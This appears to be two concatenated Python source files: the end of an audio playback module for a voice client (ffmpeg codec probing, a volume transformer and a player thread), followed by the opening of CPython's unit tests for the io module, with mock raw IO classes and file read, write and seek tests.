"quiet",
"-print_format",
"json",
"-show_streams",
"-select_streams",
"a:0",
source,
]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data["streams"][0]
codec = streamdata.get("codec_name")
bitrate = int(streamdata.get("bit_rate", 0))
bitrate = max(round(bitrate / 1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = "ffmpeg") -> Tuple[Optional[str], Optional[int]]:
args = [executable, "-hide_banner", "-i", source]
proc = subprocess.Popen(
args,
creationflags=CREATE_NO_WINDOW,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
out, _ = proc.communicate(timeout=20)
output = out.decode("utf8")
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b"")
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f"expected AudioSource not {original.__class__.__name__}.")
if original.is_opus():
raise ClientException("AudioSource must not be Opus encoded.")
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception("Calling the after function failed.")
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f"Exception in voice thread {self.name}"
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue # Skip subtest that uses a background thread
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
class PathLike:
def __init__(self, path):
self.path = path
def __fspath__(self):
return self.path
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(PathLike(support.TESTFN))
check_path_succeeds(PathLike(support.TESTFN.encode('utf-8')))
bad_path = PathLike(TypeError)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(PathLike(support.TESTFN), 'rwxa')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
